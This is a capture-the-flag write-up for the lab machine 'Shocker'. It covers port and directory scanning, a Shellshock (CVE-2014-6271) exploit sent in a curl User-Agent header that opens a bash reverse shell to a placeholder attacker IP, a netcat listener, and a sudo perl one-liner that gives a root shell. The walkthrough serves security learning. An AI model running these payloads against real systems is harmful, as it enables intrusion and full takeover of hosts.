Shocker
Shocker Writeup
Table of Contents
1. Recon
As usual, we start with an Nmap scan to identify open ports and services.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
figueron@kali$ nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 06:29 EDT
Nmap scan report for 10.10.10.56
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
figueron@kali$ nmap -p 80,2222 -sCV -oA scans/nmap-tcpscripts 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-16 06:30 EDT
Nmap scan report for 10.10.10.56
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.35 seconds
When visiting the website, we see a simple page with spider telling βDonβt bug me!β.
2. Web Recon
As we dont see anything interesting on the website, we can run a feroxbuster scan to find hidden directories.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
figueron@kali$ feroxbuster -u http://10.10.10.56 -f -n
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.2.1
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://10.10.10.56
π Threads β 50
π Wordlist β /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405]
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.2.1
π Config File β /etc/feroxbuster/ferox-config.toml
πͺ Add Slash β true
π« Do Not Recurse β true
π New Version Available β https://github.com/epi052/feroxbuster/releases/latest
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Cancel Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
403 11l 32w 294c http://10.10.10.56/cgi-bin/
403 11l 32w 292c http://10.10.10.56/icons/
403 11l 32w 300c http://10.10.10.56/server-status/
[####################] - 15s 29999/29999 0s found:3 errors:0
[####################] - 14s 29999/29999 2039/s http://10.10.10.56
This was the execution that showed more info, with flags -f to append / to each requestβs URL, this means that there would be more paths inside this matches and -n to not recurse.
Next, we do this for every match we found.
For the /cgi-bin/ directory, we can try for .sh, .cgi and .pl files, because they are common in this kind of directories. Cgi-bin is a directory used to execute scripts on the server side.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
figueron@kali$ feroxbuster -u http://10.10.10.56/cgi-bin/ -x sh,cgi,pl
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.2.1
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://10.10.10.56/cgi-bin/
π Threads β 50
π Wordlist β /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405]
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.2.1
π Config File β /etc/feroxbuster/ferox-config.toml
π² Extensions β [sh, cgi, pl]
π Recursion Depth β 4
π New Version Available β https://github.com/epi052/feroxbuster/releases/latest
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Cancel Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
200 7l 17w 0c http://10.10.10.56/cgi-bin/user.sh
[####################] - 57s 359988/359988 0s found:1 errors:0
[####################] - 57s 119996/119996 2089/s http://10.10.10.56/cgi-bin/
We found a user.sh file, letβs see what it contains.
Going to the website with burp and capturing the request, we can see that the user.sh file is being executed and in this case this is the command uptime.
This would be an example of uptime:
1
2
figueron@kali$ uptime
07:08:38 up 5 days, 16:27, 35 users, load average: 0.00, 0.08, 0.18
3. CVE-2014-6271
After a bit of researching, I found this interesting CVE.
info: βThis vulnerability impacts the Bourne Again Shell (Bash). Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface (CGI).β
1
figueron@kali$ curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1"
Now, we just listen to that port on the attacker machine and we will get a shell.
1
figueron@kali$ nc -lvnp <port>
4. Privilege Escalation
After getting a shell, we can see that we are the user shelly. So we can run sudo -l to see what we can run as root.
1
2
3
4
5
6
7
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
We can run perl as root, so we can use this to get a root shell.
TIP: GTFOBins is a nice place to look for when there is a common binary that can be used to escalate privileges, this page contains lots of ways to exploit binaries.
1
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
Now we can read the root flag.
Done !!